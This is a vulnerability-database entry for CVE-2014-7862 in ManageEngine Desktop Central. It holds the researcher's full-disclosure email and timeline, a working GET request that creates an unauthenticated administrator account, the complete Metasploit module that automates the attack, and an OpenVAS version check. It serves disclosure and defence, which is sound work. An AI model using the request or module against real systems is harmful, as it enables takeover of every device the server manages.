[The ManageOwnage Series, part X]: 0-day administrator account creation in Desktop Central
2015-01-02T00:00:00
ID SECURITYVULNS:DOC:31587 Type securityvulns Reporter Securityvulns Modified 2015-01-02T00:00:00
Description
Hi,
This is part 10 of the ManageOwnage series. For previous parts, see [1].
This time we have a vulnerability that allows an unauthenticated user
to create an administrator account, which can then be used to execute
code on all devices managed by Desktop Central (desktops, servers,
mobile devices, etc).
An auxiliary Metasploit module that creates the administrator account
has been released and its currently awaiting review [2]. I will leave
to someone else the task of creating an exploit that executes code on
all managed devices (it's not hard to write but testing it properly
might take a fair few hours).
I am releasing this as a 0 day as 112 days have elapsed since I first
communicated the vulnerability to ManageEngine. I received many
promises about getting updates but they were very evasive (a
disclosure timeline is at the bottom of this email). The full advisory
text is below, and a copy can be obtained from my repo [3].
Regards,
Pedro
>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 31/12/2014 / Last updated: 31/12/2014
>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."
This vulnerability is being released as a 0day since ManageEngine
failed to take action after 112 days. See timeline for details.
>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards
GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337
This creates a new administrator user "dcpwn" with the password
"admin". You can now execute code on all devices managed by Desktop
Central!
A Metasploit module that exploits this vulnerability has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 112 days.
Timeline of disclosure:
11/09/2014:
- Vulnerability information sent to Romanus, Desktop Central project manager.
23/09/2014:
- Requested an update. Received reply "My development team is working
on this to provide a fix. Let me check this and update you the
status."
17/10/2014
- Requested an update. Received reply on the 19th "Due to festive
season here i'm unable to get the update. Let me find this and update
you by Monday."
30/10/2014
- Requested an update. Received reply "The development and testing of
the reported part should get over in another 3 weeks and when it is
ready for release build I'll send it for testing."
23/11/2014
- Requested an update. Received reply on the 24th "I was traveling
hence couldn't give you an update. It should get released by next
week or early second week. I'll send you an update on this."
31/12/2014
- Released information and exploit 112 days after initial disclosure.
{"id": "SECURITYVULNS:DOC:31587", "bulletinFamily": "software", "title": "[The ManageOwnage Series, part X]: 0-day administrator account creation in Desktop Central", "description": "\r\n\r\nHi,\r\n\r\nThis is part 10 of the ManageOwnage series. For previous parts, see [1].\r\n\r\nThis time we have a vulnerability that allows an unauthenticated user\r\nto create an administrator account, which can then be used to execute\r\ncode on all devices managed by Desktop Central (desktops, servers,\r\nmobile devices, etc).\r\nAn auxiliary Metasploit module that creates the administrator account\r\nhas been released and its currently awaiting review [2]. I will leave\r\nto someone else the task of creating an exploit that executes code on\r\nall managed devices (it's not hard to write but testing it properly\r\nmight take a fair few hours).\r\n\r\nI am releasing this as a 0 day as 112 days have elapsed since I first\r\ncommunicated the vulnerability to ManageEngine. I received many\r\npromises about getting updates but they were very evasive (a\r\ndisclosure timeline is at the bottom of this email). The full advisory\r\ntext is below, and a copy can be obtained from my repo [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 31/12/2014 / Last updated: 31/12/2014\r\n\r\n>> Background on the affected product:\r\n"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more."\r\n\r\nThis vulnerability is being released as a 0day since ManageEngine\r\nfailed to take action after 112 days. See timeline for details.\r\n\r\n>> Technical details:\r\nVulnerability: Administrator account creation (unauthenticated)\r\nCVE-2014-7862\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: all versions from v7 onwards\r\n\r\nGET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337\r\n\r\nThis creates a new administrator user "dcpwn" with the password\r\n"admin". You can now execute code on all devices managed by Desktop\r\nCentral!\r\n\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 112 days.\r\n\r\nTimeline of disclosure:\r\n11/09/2014:\r\n- Vulnerability information sent to Romanus, Desktop Central project manager.\r\n\r\n23/09/2014:\r\n- Requested an update. Received reply "My development team is working\r\non this to provide a fix. Let me check this and update you the\r\nstatus."\r\n\r\n17/10/2014\r\n- Requested an update. Received reply on the 19th "Due to festive\r\nseason here i'm unable to get the update. Let me find this and update\r\nyou by Monday."\r\n\r\n30/10/2014\r\n- Requested an update. Received reply "The development and testing of\r\nthe reported part should get over in another 3 weeks and when it is\r\nready for release build I'll send it for testing."\r\n\r\n23/11/2014\r\n- Requested an update. Received reply on the 24th "I was traveling\r\nhence couldn't give you an update. It should get released by next\r\nweek or early second week. I'll send you an update on this."\r\n\r\n31/12/2014\r\n- Released information and exploit 112 days after initial disclosure.\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\nhttp://seclists.org/fulldisclosure/2014/Nov/21\r\nhttp://seclists.org/fulldisclosure/2014/Dec/9\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4493\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt\r\n\r\n", "published": "2015-01-02T00:00:00", "modified": "2015-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31587", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-7862"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:56", "edition": 1, "viewCount": 18, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-08-31T11:10:56", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-7862"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129769"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:245899E697F1760110E2F67FEB18BFD2"]}, {"type": "exploitdb", "idList": ["EDB-ID:43892"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812521"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_90109_USER_ADD.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_90109_USER_ADD_SAFE.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/MANAGE_ENGINE_DC_CREATE_ADMIN"]}, {"type": "zdt", "idList": ["1337DAY-ID-29646", "1337DAY-ID-23075"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14189"]}], "modified": "2018-08-31T11:10:56", "rev": 2}, "vulnersScore": 7.4}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-09T19:58:27", "description": "The DCPluginServelet servlet in ManageEngine Desktop Central and Desktop Central MSP before build 90109 allows remote attackers to create administrator accounts via an addPlugInUser action.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-04T17:29:00", "title": "CVE-2014-7862", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7862"], "modified": "2018-10-09T19:53:00", "cpe": ["cpe:/a:zohocorp:desktop_central:*"], "id": "CVE-2014-7862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7862", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:desktop_central:*:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-10T07:36:19", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central - Create Administrator Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29646", "id": "1337DAY-ID-29646", "sourceData": ">> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n=================================================================================\r\nDisclosure: 31/12/2014 / Last updated: 05/01/2015\r\n \r\n>> Background on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more.\"\r\n \r\nThis vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.\r\n \r\n>> Technical details:\r\nVulnerability: Administrator account creation (unauthenticated)\r\nCVE-2014-7862\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: all versions from v7 onwards\r\n \r\nGET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla[email\u00a0protected]&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337\r\n \r\nThis creates a new administrator user \"dcpwn\" with the password \"admin\". You can now execute code on all devices managed by Desktop Central!\r\nA Metasploit auxiliary module that exploits this vulnerability has been released.\r\n \r\n>> Fix: \r\n(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.\r\n \r\nThis vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.\r\n \r\nTimeline of disclosure:\r\n11/09/2014:\r\n- Vulnerability information sent to Romanus, Desktop Central project manager.\r\n \r\n23/09/2014:\r\n- Requested an update. Received reply \"My development team is working on this to provide a fix. Let me check this and update you the status.\"\r\n \r\n17/10/2014\r\n- Requested an update. Received reply on the 19th \"Due to festive season here i'm unable to get the update. Let me find this and update you by Monday.\"\r\n \r\n30/10/2014\r\n- Requested an update. Received reply \"The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing.\"\r\n \r\n23/11/2014\r\n- Requested an update. Received reply on the 24th \"I was traveling hence couldn't give you an update. It should get released by next week or early second week. I'll send you an update on this.\"\r\n \r\n15/12/2014\r\n- Requested an update. Received reply on the 18th \"it has been handled from the Desktop Central side and awaiting for the release\".\r\n \r\n31/12/2014\r\n- Released information and exploit 112 days after initial disclosure.\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/29646", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-12T05:56:34", "description": "This module exploits an administrator account creation vulnerability in Desktop Central from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in several versions of Desktop Central (including MSP) from v7 onwards.", "edition": 2, "published": "2015-01-06T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Administrator Account Creation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2015-01-06T00:00:00", "id": "1337DAY-ID-23075", "href": "https://0day.today/exploit/description/23075", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Auxiliary::Report\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine Desktop Central Administrator Account Creation',\r\n'Description' => %q{\r\nThis module exploits an administrator account creation vulnerability in Desktop Central\r\nfrom v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\r\nseveral versions of Desktop Central (including MSP) from v7 onwards.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n['CVE', '2014-7862'],\r\n['OSVDB', '116554'],\r\n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],\r\n['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']\r\n],\r\n'DisclosureDate' => 'Dec 31 2014'))\r\nregister_options(\r\n[\r\nOptPort.new('RPORT', [true, 'The target port', 8020]),\r\nOptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),\r\nOptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),\r\nOptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),\r\nOptString.new('EMAIL', [true, 'The email for the new admin account', '[email\u00a0protected]'])\r\n], self.class)\r\nend\r\ndef run\r\n# Generate password hash\r\nsalt = Time.now.to_i.to_s\r\npassword_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, \"/servlets/DCPluginServelet\"),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'action' => 'addPlugInUser',\r\n'role' => 'DCAdmin',\r\n'userName' => datastore['USERNAME'],\r\n'email' => datastore['EMAIL'],\r\n'phNumber' => Rex::Text.rand_text_numeric(6),\r\n'password' => password_encoded,\r\n'salt' => salt,\r\n'createdtime' => salt\r\n}\r\n})\r\n# Yes, \"sucess\" is really mispelt, as is \"Servelet\" ... !\r\nunless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/\r\nprint_error(\"#{peer} - Administrator account creation failed\")\r\nend\r\nprint_good(\"#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\nservice_data = {\r\naddress: rhost,\r\nport: rport,\r\nservice_name: (ssl ? 'https' : 'http'),\r\nprotocol: 'tcp',\r\nworkspace_id: myworkspace_id\r\n}\r\ncredential_data = {\r\norigin_type: :service,\r\nmodule_fullname: self.fullname,\r\nprivate_type: :password,\r\nprivate_data: datastore['PASSWORD'],\r\nusername: datastore['USERNAME']\r\n}\r\ncredential_data.merge!(service_data)\r\ncredential_core = create_credential(credential_data)\r\nlogin_data = {\r\ncore: credential_core,\r\naccess_level: 'Administrator',\r\nstatus: Metasploit::Model::Login::Status::UNTRIED\r\n}\r\nlogin_data.merge!(service_data)\r\ncreate_credential_login(login_data)\r\nend\r\nend\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23075"}], "exploitdb": [{"lastseen": "2018-01-25T18:52:46", "description": "ManageEngine Desktop Central - Create Administrator. CVE-2014-7862. Webapps exploit for Multiple platform", "published": "2015-01-15T00:00:00", "type": "exploitdb", "title": "ManageEngine Desktop Central - Create Administrator", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2015-01-15T00:00:00", "id": "EDB-ID:43892", "href": "https://www.exploit-db.com/exploits/43892/", "sourceData": ">> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 31/12/2014 / Last updated: 05/01/2015\r\n\r\n>> Background on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more.\"\r\n\r\nThis vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.\r\n\r\n>> Technical details:\r\nVulnerability: Administrator account creation (unauthenticated)\r\nCVE-2014-7862\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: all versions from v7 onwards\r\n\r\nGET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337\r\n\r\nThis creates a new administrator user \"dcpwn\" with the password \"admin\". You can now execute code on all devices managed by Desktop Central!\r\nA Metasploit auxiliary module that exploits this vulnerability has been released.\r\n\r\n>> Fix: \r\n(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.\r\n\r\nThis vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.\r\n\r\nTimeline of disclosure:\r\n11/09/2014:\r\n- Vulnerability information sent to Romanus, Desktop Central project manager.\r\n\r\n23/09/2014:\r\n- Requested an update. Received reply \"My development team is working on this to provide a fix. Let me check this and update you the status.\"\r\n\r\n17/10/2014\r\n- Requested an update. Received reply on the 19th \"Due to festive season here i'm unable to get the update. Let me find this and update you by Monday.\"\r\n\r\n30/10/2014\r\n- Requested an update. Received reply \"The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing.\"\r\n\r\n23/11/2014\r\n- Requested an update. Received reply on the 24th \"I was traveling hence couldn't give you an update. It should get released by next week or early second week. I'll send you an update on this.\"\r\n\r\n15/12/2014\r\n- Requested an update. Received reply on the 18th \"it has been handled from the Desktop Central side and awaiting for the release\".\r\n\r\n31/12/2014\r\n- Released information and exploit 112 days after initial disclosure.\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43892/"}], "openvas": [{"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7862"], "description": "This host is installed with ManageEngine\n Desktop Central and is prone to security bypass vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2018-02-23T00:00:00", "id": "OPENVAS:1361412562310812521", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812521", "type": "openvas", "title": "ManageEngine Desktop Central Remote Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ManageEngine Desktop Central Remote Security Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_desktop_central\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812521\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2014-7862\");\n script_bugtraq_id(71849);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-23 15:47:34 +0530 (Fri, 23 Feb 2018)\");\n script_name(\"ManageEngine Desktop Central Remote Security Bypass Vulnerability\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_desktop_central_detect.nasl\");\n script_mandatory_keys(\"ManageEngine/Desktop_Central/installed\");\n script_require_ports(\"Services/www\", 8040);\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/archive/1/archive/1/534356/100/0/threaded\");\n script_xref(name:\"URL\", value:\"https://www.manageengine.com/products/desktop-central/cve20147862-unauthorized-account-creation.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ManageEngine\n Desktop Central and is prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists in 'DCPluginServelet' while\n creating the administrator account.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to bypass security restrictions and perform unauthorized actions. This may\n aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine Desktop Central/MSP before build 90109\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ManageEngine Desktop Central build\n version 90109 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!mePort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:mePort, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"90109\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Upgrade to build 90109\", install_path:path);\n security_message(port:mePort, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:04", "description": "", "published": "2014-12-31T00:00:00", "type": "packetstorm", "title": "Desktop Central Add Administrator", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2014-12-31T00:00:00", "id": "PACKETSTORM:129769", "href": "https://packetstormsecurity.com/files/129769/Desktop-Central-Add-Administrator.html", "sourceData": "`Hi, \n \nThis is part 10 of the ManageOwnage series. For previous parts, see [1]. \n \nThis time we have a vulnerability that allows an unauthenticated user \nto create an administrator account, which can then be used to execute \ncode on all devices managed by Desktop Central (desktops, servers, \nmobile devices, etc). \nAn auxiliary Metasploit module that creates the administrator account \nhas been released and its currently awaiting review [2]. I will leave \nto someone else the task of creating an exploit that executes code on \nall managed devices (it's not hard to write but testing it properly \nmight take a fair few hours). \n \nI am releasing this as a 0 day as 112 days have elapsed since I first \ncommunicated the vulnerability to ManageEngine. I received many \npromises about getting updates but they were very evasive (a \ndisclosure timeline is at the bottom of this email). The full advisory \ntext is below, and a copy can be obtained from my repo [3]. \n \nRegards, \nPedro \n \n>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 31/12/2014 / Last updated: 31/12/2014 \n \n>> Background on the affected product: \n\"Desktop Central is an integrated desktop & mobile device management \nsoftware that helps in managing the servers, laptops, desktops, \nsmartphones and tablets from a central point. It automates your \nregular desktop management routines like installing patches, \ndistributing software, managing your IT Assets, managing software \nlicenses, monitoring software usage statistics, managing USB device \nusage, taking control of remote desktops, and more.\" \n \nThis vulnerability is being released as a 0day since ManageEngine \nfailed to take action after 112 days. See timeline for details. \n \n>> Technical details: \nVulnerability: Administrator account creation (unauthenticated) \nCVE-2014-7862 \nConstraints: none; no authentication or any other information needed \nAffected versions: all versions from v7 onwards \n \nGET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337 \n \nThis creates a new administrator user \"dcpwn\" with the password \n\"admin\". You can now execute code on all devices managed by Desktop \nCentral! \n \nA Metasploit module that exploits this vulnerability has been released. \n \n>> Fix: \nUNFIXED - ManageEngine failed to take action after 112 days. \n \nTimeline of disclosure: \n11/09/2014: \n- Vulnerability information sent to Romanus, Desktop Central project manager. \n \n23/09/2014: \n- Requested an update. Received reply \"My development team is working \non this to provide a fix. Let me check this and update you the \nstatus.\" \n \n17/10/2014 \n- Requested an update. Received reply on the 19th \"Due to festive \nseason here i'm unable to get the update. Let me find this and update \nyou by Monday.\" \n \n30/10/2014 \n- Requested an update. Received reply \"The development and testing of \nthe reported part should get over in another 3 weeks and when it is \nready for release build I'll send it for testing.\" \n \n23/11/2014 \n- Requested an update. Received reply on the 24th \"I was traveling \nhence couldn't give you an update. It should get released by next \nweek or early second week. I'll send you an update on this.\" \n \n31/12/2014 \n- Released information and exploit 112 days after initial disclosure. \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \nhttp://seclists.org/fulldisclosure/2014/Nov/21 \nhttp://seclists.org/fulldisclosure/2014/Dec/9 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4493 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/129769/desktopcentral-addadmin.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine Desktop Central - Create Administrator", "edition": 1, "published": "2015-01-15T00:00:00", "title": "ManageEngine Desktop Central - Create Administrator", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7862"], "modified": "2015-01-15T00:00:00", "id": "EXPLOITPACK:245899E697F1760110E2F67FEB18BFD2", "href": "", "sourceData": ">> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 31/12/2014 / Last updated: 05/01/2015\n\n>> Background on the affected product:\n\"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more.\"\n\nThis vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.\n\n>> Technical details:\nVulnerability: Administrator account creation (unauthenticated)\nCVE-2014-7862\nConstraints: none; no authentication or any other information needed\nAffected versions: all versions from v7 onwards\n\nGET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337\n\nThis creates a new administrator user \"dcpwn\" with the password \"admin\". You can now execute code on all devices managed by Desktop Central!\nA Metasploit auxiliary module that exploits this vulnerability has been released.\n\n>> Fix: \n(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.\n\nThis vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.\n\nTimeline of disclosure:\n11/09/2014:\n- Vulnerability information sent to Romanus, Desktop Central project manager.\n\n23/09/2014:\n- Requested an update. Received reply \"My development team is working on this to provide a fix. Let me check this and update you the status.\"\n\n17/10/2014\n- Requested an update. Received reply on the 19th \"Due to festive season here i'm unable to get the update. Let me find this and update you by Monday.\"\n\n30/10/2014\n- Requested an update. Received reply \"The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing.\"\n\n23/11/2014\n- Requested an update. Received reply on the 24th \"I was traveling hence couldn't give you an update. It 